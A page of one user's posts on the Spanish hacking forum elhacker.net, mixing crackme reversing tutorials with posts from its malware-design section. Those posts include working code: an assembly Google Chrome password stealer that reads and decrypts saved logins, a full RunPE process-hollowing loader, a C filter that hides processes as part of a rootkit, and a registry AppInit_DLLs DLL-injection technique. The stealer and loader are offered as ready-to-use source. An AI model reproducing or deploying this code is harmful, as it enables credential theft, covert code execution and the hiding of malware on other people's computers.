elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6 7 8 9 10
31  Programación / Ingeniería Inversa / [Tutorial] Desempacando FSG 2.0 en: 12 Febrero 2016, 02:03 am
Mirando crackmes para practicar aquí me tope con uno que estaba empacado con este packer (FSG 2.0). Me puse a buscar por internet y no vi ningún tuto en español, excepto uno de +NCR de CracksLatinos, asique me decidi seguirlo y probar a desempacarlo.

El crackme en cuestion es CrackMe#1 (Lucky) de KLiZMA, lo podeis buscar en la web antes citada.

Para desempacarlo vamos a necesitar el plugin OllyDump, que podemos obtener desde aquí.

Bueno, una vez hecho esto lo abrimos con RDG Packer y vemos que efectivamente, esta empacado  :xD



Lo abrimos con OllyDbg y vamos a ver algo así.



Ahora vamos a buscar el verdaero OEP, para ello vamos a Plugins > OllyDump > Find OEP by section hop (Trace Over).

Y caemos aquí



Ahora clic derecho > Analisis > Remove Analisis from this module. Y ahí vemos  el verdadero OEP.



Ahora, vamos a guardar los cambios, para ello vamos a Plugins > OllyDump > Dump Debugger Process. Le damos al botón Dump y guardamos el ejecutable desempacado.

Ahora nos surge otro problema, por lo menos en Windows 7 de 64 bits y es qeu al intentar ejecutarlo, nuestro ejecutable no funciona  :¬¬



Para que funcione tendremos que hacer clic derecho sobre el ejecutable y darle a solucionar opciones de compatibilidad. Seguir el asistente y dejarlo con la configuración que nos recomienda el SO.

Y bueno, ahora si nos deja ejecutarlo correctamente.



Bueno, pues eso ha sido todo. No es un gran cosa pero en determinados casos te puede sacar de un "apuro".  

Espero que a alguien le sirva.

saludos.
32  Seguridad Informática / Análisis y Diseño de Malware / [FILTRO] Ocultando procesos a NtQuerySystemInformacion en: 6 Febrero 2016, 08:03 am
No es el código completo, ya que sería todo demasiado masticado  :xD peeero, lo que queda de implementar (el hook a la api) se puede hacer fácilmente siguiendo mi tutorial sobre ello.

Esto es solo un ejemplo de cómo sería el filtro para ocultar procesos a dicha API (la que usa el admin de tareas para listar los procesos)  >:D

Si abrimos  la calculadora de windows (calc.exe) y descomentamos las línea de código vamos a ver como va mostrando todos los procesos menos el que ocultamos nosotros (con el while anterior).

En fin, aquí esta el código.

Código
  1. // Filtro procesos a la API NtQuerySystemInformation
  2. // Juan fary.
  3. // MVSC++ 2008
  4.  
  5. #include <windows.h>
  6. #include <stdio.h>
  7. #include <stdlib.h>
  8.  
  9. typedef struct _SYSTEM_PROCESS_INFORMATION
  10. {
  11.    DWORD NextEntryOffset;
  12. char fary1[56];
  13.    DWORD ImageName;
  14. DWORD fary2;
  15.    LONG BasePriority;
  16.    PVOID UniqueProcessId;
  17. } SYSTEM_PROCESS_INFORMATION;
  18.  
  19. typedef DWORD (WINAPI * _SystemProcessInformation)(DWORD, void*, unsigned long, unsigned long*);
  20.  
  21. int main()
  22. {
  23. _SYSTEM_PROCESS_INFORMATION * spi;
  24. DWORD ret;
  25. char proceso[18] = "c\0a\0l\0c\0.\0e\0x\0e\0\0"; // "calc.exe" en unicode proceso que no se mostrará
  26.  
  27. _SystemProcessInformation __SystemProcessInformation = (_SystemProcessInformation)GetProcAddress(LoadLibraryA("NTDLL.DLL"), "NtQuerySystemInformation");
  28.  
  29. void * buffer = VirtualAlloc(NULL, 1024*1024, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
  30.  
  31. spi = (_SYSTEM_PROCESS_INFORMATION *)buffer;
  32.  
  33. ret = __SystemProcessInformation(5, spi, 1024*1024, NULL);
  34.  
  35.  
  36. //_SYSTEM_PROCESS_INFORMATION * Intacta = spi; // Para comprobar que el hook funciono.
  37.  
  38.  
  39. while(spi->NextEntryOffset) // Filtro para saltar el proceso que nosotros queramos.
  40. {
  41. _SYSTEM_PROCESS_INFORMATION * Viejospi = spi;
  42. spi = (_SYSTEM_PROCESS_INFORMATION*)((LPBYTE)spi+spi->NextEntryOffset);
  43.  
  44. if (lstrcmpW((LPCWSTR)spi->ImageName,(LPCWSTR)proceso) == 0)
  45. {
  46. Viejospi->NextEntryOffset += (DWORD)spi->NextEntryOffset;
  47. }else{
  48. spi = Viejospi;
  49. spi = (_SYSTEM_PROCESS_INFORMATION*)((LPBYTE)spi+spi->NextEntryOffset);
  50. }        
  51. }
  52.  
  53. /*spi = Intacta;
  54. while(spi->NextEntryOffset) // Comprobamos que muestra todos los procemos menos el que ocultamos ;P
  55.     {
  56.         MessageBoxW(0, (LPCWSTR) spi->ImageName, 0, 0);
  57.         spi=(_SYSTEM_PROCESS_INFORMATION*)((LPBYTE)spi+spi->NextEntryOffset);
  58.     }*/
  59.  
  60. return 0;
  61. }

Sí teneis alguna duda o queréis que ponga el código completo del rootkit avisar, aunque perdería la gracia.

saludos.
33  Programación / Ingeniería Inversa / [Tutorial Nivel básico] Haciendo cantar a nuestro Crackme en: 4 Febrero 2016, 22:12 pm
En este tema intentaré explicar como hacer  de nuestro Crackme, un Keygen. Modificando su comportamiento.

Decir que, esta técnica no funciona con todos los crackme, pero normalmente con los que suele hacer un strcmp suele funcionar.

En esta práctica vamos a usar el Crackme V1 de Yo-Mismo. Lo podemos descargar de aquí (estando registrados).

http://crackmes.de/users/yo_mismo/crackme_v1/

Bien, una vez que tenemos el crackme lo abrimos con OllyDbg. Lo importante es llegar al punto caliente donde compara el seríal que genera con el que nosotros introducimos, para ello en este caso pondremos un BP en scanf. Y se nos parará aquí:



Un poco mas abajo veremos el strcmp:
Código:
00401389  |. E8 52040000    CALL <JMP.&msvcrt.strcmp>                ; \strcmp

ponemos un BreakPoint en el. Introducimos usuario y serial y se nos parará en la función, vamos a examinarlo.



En la dirección 0x00404010 esta el serial correcto y en la dirección 0x00404020 esta el seríal que nosotros hemos introducido.

Anotamos la dirección donde guarda en seríal generado para nuestro usuario, osea 0x00404010.

Ahora lo que haremos será modificar la función printf, para que cuando valla a dar el error de “chico malo” en vez de mostrar el error muestre lo que sería el seríal válido para el usuario introducido.

Un poco mas abajo veremos donde muestra el mensage de error y el mensage correcto.



Entonces todo lo que tenemos que hacer es modificar esta linea:
Código:
004013A8  |> C70424 6420400>MOV DWORD PTR SS:[ESP],crack.00402064    ; |ASCII "Sigue intentando..."

Por esta otra:

Código:
004013A8     C70424 1010400>MOV DWORD PTR SS:[ESP],crack.404010

Ahora guardemos los cambios. Clic derecho>Copy To executable>All Modifications.
Clic derecho de nuevo en la ventana que nos paarecio > Save File.

Guardamos con el nombre que queramos y listo.

El único requisito que debemos cumplir es que el usuario y el serial que introduzcamos debe tener una longitud igual o mayor a 4. Si observas el algoritmo del Crackme lo vas a poder ver ;)

Ejemplo de como funciona nuestro keygen:





Eso fue todo :) Espero que se haya entendido algo, y nada, se que esto es muy básico pero seguro que a mas de uno de los que empiezan le va a servir.

un saludo.
34  Foros Generales / Foro Libre / Cuarto Milenio. en: 1 Febrero 2016, 01:29 am
Bueno, pues, esto es solo una curiosidad.

¿Cuantos de ustedes siguen este programa?

Me parece un programa interesantisimo y lo sigo desde hace años.

saludos.
35  Seguridad Informática / Análisis y Diseño de Malware / Inyección DLL por registro. en: 27 Enero 2016, 00:56 am
Bueno, creo que esto no se ha hablado por aquí aunque es un poco viejuno :P

Se trata de modificar un valor  de esta ruta del registro:

Código:
HKEY_LOCAL_MACHINES\Software\Microsoft\WindowsNT\CurrentVersion\Windows\


El valor AppInit_DLLs. En el pondrémos la ruta de nuestra DLL. Nuestra DLL será cargada cuando inicie una aplicación y cargue USER32.DLL.

saludos. :P
36  Programación / Ingeniería Inversa / [RETO] Febrero 2016 en: 25 Enero 2016, 21:20 pm
Las reglas:

https://foro.elhacker.net/ingenieria_inversa/retos_mensuales_de_reversing-t371874.0.html

1- A.ZIP: Nivel 1.
http://www.mediafire.com/download/66tf5di5dv4drwf/a.zip

2 - Level-4.ZIP: Nivel 1.
http://www.mediafire.com/download/lj4sg9n279c8mts/level-4.zip

3 - SA_Lock_System_-_CrackMe_-_0x90.ZIP: Nivel 1.
http://www.mediafire.com/download/8h7k24wobrvs7lb/C1-SA_Lock_System_-_CrackMe_-_0x90.zip

4- Kgm#1.ZIP: Nivel 2.
http://www.mediafire.com/download/x5cwxr6wc7xn6cw/Kgm%231.zip

Fuente de los crackmes: crackmes.de

saludos!!
37  Seguridad Informática / Análisis y Diseño de Malware / [ASM] Stealer Google Chrome. en: 21 Enero 2016, 08:58 am
Bueno, antes de nada este código se lo quiero dedicar a kub0x, que le gustan los códigos en ensamblador  :laugh:

Es un Stealer del navegador Google Chrome, funcional con la última versión.



Código fuente:

Código
  1. ; Stealer Google Chrome
  2. ; Programado por Juan fary.
  3. ; Flat Assembler.
  4.  
  5. format PE Console 4.0
  6. entry start
  7. include 'win32ax.inc'
  8.  
  9. section '.data' data readable writeable
  10.        ruta         db '\Local\Google\Chrome\User Data\Default\Login Data',0
  11.        query        db 'SELECT origin_url, username_value, password_value FROM logins',0
  12.  
  13.        bd           dd ?
  14.        stmt         dd ?
  15.  
  16.        URL          db 'URL: %s',10,13,0
  17.        Usuario      db 'Usuario: %s',10,13,0
  18.        PASS         db 'PASS: %s',10,13,0
  19.  
  20.        struct DATA_BLOB
  21.               cbData   dd ?
  22.               pbData   dd ?
  23.        ends
  24.  
  25.        datain      DATA_BLOB
  26.        dataout     DATA_BLOB
  27.  
  28.        buffer      rb 255
  29.  
  30.        barra       db '-----------------------------------------------------',10,13,0
  31.  
  32.        BufferRuta  rb 512
  33.        APPDATA     db 'APPDATA',0
  34.  
  35. section '.code' code readable executable
  36. start:
  37.        invoke GetEnvironmentVariableA, APPDATA, BufferRuta,512
  38.        invoke lstrcat, BufferRuta, ruta
  39.  
  40.        cinvoke sqlite3_open, BufferRuta, bd
  41.        cmp eax, 0 ; eax = SQLITE_OK
  42.        jne salir
  43.  
  44.        cinvoke sqlite3_prepare_v2, [bd] , query, -1 ,stmt,0
  45.        cmp eax, 0 ; eax = SQLITE_OK
  46.        jne salir
  47.  
  48.    BuclePass:
  49.        cinvoke sqlite3_step, [stmt]
  50.        cmp eax, 100 ; eax = SQLITE_ROW
  51.        jne salir
  52.  
  53.        cinvoke printf,barra
  54.  
  55.        cinvoke sqlite3_column_text , [stmt], 0  ; URL
  56.        cinvoke printf,URL,eax
  57.  
  58.        cinvoke sqlite3_column_text , [stmt], 1  ; USUARIO
  59.        cinvoke printf,Usuario,eax
  60.  
  61.        cinvoke sqlite3_column_text , [stmt], 2  ; Contraseña
  62.  
  63.        mov [datain.pbData], eax
  64.        mov [datain.cbData], 512
  65.  
  66.        invoke CryptUnprotectData , datain, 0, 0, 0, 0, 0, dataout
  67.  
  68.        mov ecx, -1
  69.     BucleNull:
  70.        mov edx, [dataout.pbData]
  71.        inc ecx
  72.  
  73.        cmp byte[edx+ecx],0x08
  74.        jne BucleNull
  75.  
  76.        mov byte[edx+ecx],0
  77.  
  78.        cinvoke printf, PASS, [dataout.pbData]
  79.  
  80.        cinvoke printf,barra
  81.  
  82.        jmp BuclePass
  83.  
  84.        salir:
  85.        cinvoke system,'PAUSE'
  86.        ret
  87.  
  88. section '.idata' import data readable writeable
  89.  
  90.        library  sqlite3, 'sqlite3.dll',\
  91.                 msvcrt, 'msvcrt.dll',\
  92.                 Crypt32, 'Crypt32.dll',\
  93.                 KERNEL32, 'KERNEL32.DLL'
  94.  
  95.        import sqlite3,\
  96.               sqlite3_open, 'sqlite3_open',\
  97.               sqlite3_prepare_v2, 'sqlite3_prepare_v2',\
  98.               sqlite3_column_text, 'sqlite3_column_text',\
  99.               sqlite3_step, 'sqlite3_step'
  100.  
  101.        import msvcrt,\
  102.               printf, 'printf',\
  103.               memcpy,'memcpy',\
  104.               system, 'system'
  105.  
  106.        import Crypt32,\
  107.               CryptUnprotectData, 'CryptUnprotectData'
  108.  
  109.        import KERNEL32,\
  110.               GetEnvironmentVariableA, 'GetEnvironmentVariableA',\
  111.               lstrcat, 'lstrcatA'

saludos.


38  Programación / ASM / Little-Endian Big-Endian en: 18 Enero 2016, 23:41 pm
Esto es solo una curiosida ampliando los datos de la wikipedia.

Código:
https://es.wikipedia.org/wiki/Endianness

En ASM.

Código
  1. ; Little-Endian ó Big-Endian
  2. ; Juan fary.
  3.  
  4. format PE Console 4.0
  5. entry start
  6. include 'win32ax.inc'
  7.  
  8. section '.data' data readable writeable
  9.        numero          dw 1
  10.  
  11.        little_endian   db 'Little-Endian!',0
  12.        big_endian      db 'Big-Endian!',0
  13.  
  14. section '.code' code readable writeable executable
  15. start:
  16.  
  17.        mov al, byte[numero]
  18.  
  19.        cmp al,1
  20.        jne Big
  21.  
  22.        invoke MessageBoxA,0,little_endian,0,MB_OK
  23.        ret
  24.  
  25.        Big:
  26.        invoke MessageBoxA,0,big_endian,0,MB_OK
  27.        ret
  28.  
  29.  
  30. section '.idata' import data readable writeable
  31.    library User32,'User32.dll'
  32.  
  33.    import User32,\
  34.           MessageBoxA,'MessageBoxA'    

saludos.
39  Seguridad Informática / Análisis y Diseño de Malware / Formato PE. en: 18 Enero 2016, 01:19 am
¿Qué es el formato PE?

Según wikipedia:

Citar
El formato Portable Executable (PE) es un formato de archivo para archivos ejecutables, de código objeto, bibliotecas de enlace dinámico (DLL), archivos de fuentes FON, y otros usados en versiones de 32 bit y 64 bit del sistema operativo Microsoft Windows.

En palabras sencillas, es la estructura que tienen los archivos ejecutables.



¿Para qué nos sirve en malware?

Pues teniendo conocimientos del PE podemos desde infectar un ejecutable, hasta cargarlo en memoria sin que toque el disco (RunPE), cargar funciones sin importarlas, en fin, una seria de ventajas que sin su conocimiento no sería posible hacer o sería posible pero de mala manera.



Manuales

-Manual Formato PE - The Swash

-Importando funciones manualmente.   -> https://www.mediafire.com/file/hpbtm61ms4o9iet/1330-IMPORTANDO_FUNCIONES_MANUALMENTE_-_The_Swash.rar/file

-Relocaciones en ejecutables.   -> https://www.mediafire.com/file/l2jp79c06jgfs58/1331-RELOCACIONES_EN_EJECUTABLES_por_The_Swash.rar/file

Talleres

-Taller Secciones formato PE - The Swash

-Taller formato PE - Ferchu

-Cifrando Malware a mano - Zero.

-LoadLibrary Manual - Yuki

Códigos

-Ret Exe Corruption - Karcrack

-Runpe en ASM - fary.

-Base Relocation - Zero.

-Infección por TLS - The Swash.



Más documentación:

https://elhacker.info/manuales/PE/

Si se me escapa algo más por ahí, avisar!
40  Seguridad Informática / Análisis y Diseño de Malware / [ASM] RunPE en: 18 Enero 2016, 00:46 am
Bueno, nunca encontre un RunPE hecho en ASM, asique hace un tiempo lo programe yo mismo.
Se los dejo por aquí...


Código
  1. ; // RunPE
  2. ; // Programado por Juan fary (mDrinky)
  3. ; // drinky.94@hotmail.com
  4.  
  5. format PE GUI 4.0
  6. include 'win32ax.inc'
  7. entry start
  8.  
  9. section '.data' readable writeable
  10.  
  11.        struct CONTEXT
  12.               ContextFlags             dd ?
  13.               Dr0                      dd ?
  14.               Dr1                      dd ?
  15.               Dr2                      dd ?
  16.               Dr3                      dd ?
  17.               Dr6                      dd ?
  18.               Dr7                      dd ?
  19.               FloatSave                dd ?
  20.               SegGs                    dd ?
  21.               SegFs                    dd ?
  22.               SegEs                    dd ?
  23.               SegDs                    dd ?
  24.               Edi                      dd ?
  25.               Esi                      dd ?
  26.               Ebx                      dd ?
  27.               Edx                      dd ?
  28.               Ecx                      dd ?
  29.               Eax                      dd ?
  30.               Ebp                      dd ?
  31.               Eip                      dd ?
  32.               SegCs                    dd ?
  33.               EFlags                   dd ?
  34.               Esp                      dd ?
  35.               SegSs                    dd ?
  36.               ExtendedRegisters        rb 512
  37.        ends
  38.  
  39.        calc            db 'c:\windows\system32\calc.exe',0
  40.        bleidos         dd 0
  41.        Datos           dd 0
  42.        Espacio         dd 0
  43.  
  44.        _SI                   STARTUPINFO ?
  45.        _PI                   PROCESS_INFORMATION ?
  46.        CTX                   CONTEXT ?
  47.  
  48.        Param2          dd 0
  49.  
  50.        ; Datos PE
  51.        imagebase       dd ?
  52.        sizeofheaders   dd ?
  53.        sizeofimage     dd ?
  54.        numseciones     dd ?
  55.  
  56.  
  57. section '.code' executable readable writeable
  58. start:
  59.        invoke CreateProcessA,calc,0,0,0,FALSE,CREATE_SUSPENDED,0,0,_SI,_PI
  60.  
  61.        invoke CreateFileA,calc, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0      ; nos autoleemos
  62.        mov ebx,eax
  63.        invoke GetFileSize,ebx,0
  64.        mov edi,eax
  65.        invoke GlobalAlloc,GPTR,edi
  66.        push eax
  67.        invoke ReadFile,ebx,eax,edi,addr bleidos,0
  68.        invoke CloseHandle,ebx
  69.        pop eax
  70.  
  71.        mov [Datos],eax
  72.  
  73.        cmp word[eax],'MZ'
  74.        jne salir
  75.  
  76.        add eax,dword[eax+0x3C]  ; PE
  77.  
  78.        cmp word[eax],'PE'
  79.        jne salir
  80.  
  81.        push dword[eax+0x34] ; imagebase
  82.        pop [imagebase]
  83.  
  84.        push dword[eax+0x54] ; sizeofheaders
  85.        pop [sizeofheaders]
  86.  
  87.        push dword[eax+0x50]
  88.        pop [sizeofimage]    ; sizeofimage
  89.  
  90.        movzx ebx,word[eax+0x6] ; numero de secciones
  91.        mov [numseciones],ebx
  92.  
  93.        push eax  ; guardamos ya EAX para el final
  94.  
  95.        push eax
  96.        invoke NtUnmapViewOfSection,[_PI.hProcess],[imagebase]
  97.        invoke VirtualAllocEx,[_PI.hProcess],[imagebase],[sizeofimage],0x3000, PAGE_EXECUTE_READWRITE
  98.        mov [Espacio],eax
  99.        invoke WriteProcessMemory,[_PI.hProcess],eax,[Datos],[sizeofheaders],0
  100.        pop eax
  101.  
  102.        mov ecx,0
  103.  
  104.        add eax,0xF8 ; posicionamos en las cabeceras de sección
  105.  
  106.        EscribirSecciones:
  107.  
  108.        inc ecx
  109.  
  110.        push ecx
  111.        push eax
  112.  
  113.        mov ebx,eax
  114.        mov ebx,dword[ebx+0xC]      ; imagebase
  115.        add ebx,[imagebase]
  116.  
  117.        mov [Param2],ebx
  118.  
  119.        mov ebx,eax
  120.        mov ebx,dword[ebx+0x14]
  121.        mov edx,[Datos]
  122.        add edx,ebx
  123.  
  124.        mov ebx,eax
  125.        mov ebx,dword[ebx+0x10]
  126.  
  127.        invoke WriteProcessMemory,[_PI.hProcess],[Param2],edx,ebx,0
  128.  
  129.        pop eax
  130.        pop ecx
  131.  
  132.        add eax,0x28  ; Siguiente IMAGE_SECTION_HEADER
  133.  
  134.        cmp ecx,[numseciones]
  135.        jne EscribirSecciones
  136.  
  137.        invoke GetThreadContext,[_PI.hProcess],CTX
  138.  
  139.        invoke WriteProcessMemory,[_PI.hProcess],dword[CTX.Ebx+8],imagebase,0x4,0
  140.  
  141.        pop eax
  142.  
  143.        add eax,dword[eax+0x3C]
  144.        mov eax,dword[eax+0x28]
  145.  
  146.        mov [CTX.Eax],eax ; EntryPoint
  147.  
  148.        invoke SetThreadContext,[_PI.hProcess],CTX
  149.  
  150.        invoke ResumeThread,[_PI.hThread]
  151.  
  152.        salir:
  153.        ret
  154.  
  155. section '.idata' import data readable writeable
  156.        library NTDLL,'NTDLL.DLL',\
  157.                KERNEL32,'KERNEL32.DLL'
  158.  
  159.        import KERNEL32,\
  160.                CreateProcessA,'CreateProcessA',\
  161.                CreateFileA,'CreateFileA',\
  162.                GetFileSize,'GetFileSize',\
  163.                GlobalAlloc,'GlobalAlloc',\
  164.                ReadFile,'ReadFile',\
  165.                CloseHandle,'CloseHandle',\
  166.                VirtualAllocEx,'VirtualAllocEx',\
  167.                WriteProcessMemory,'WriteProcessMemory',\
  168.                GetThreadContext,'GetThreadContext',\
  169.                SetThreadContext,'SetThreadContext',\
  170.                ResumeThread,'ResumeThread'
  171.  
  172.        import NTDLL,NtUnmapViewOfSection,'NtUnmapViewOfSection'
Páginas: 1 2 3 [4] 5 6 7 8 9 10
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines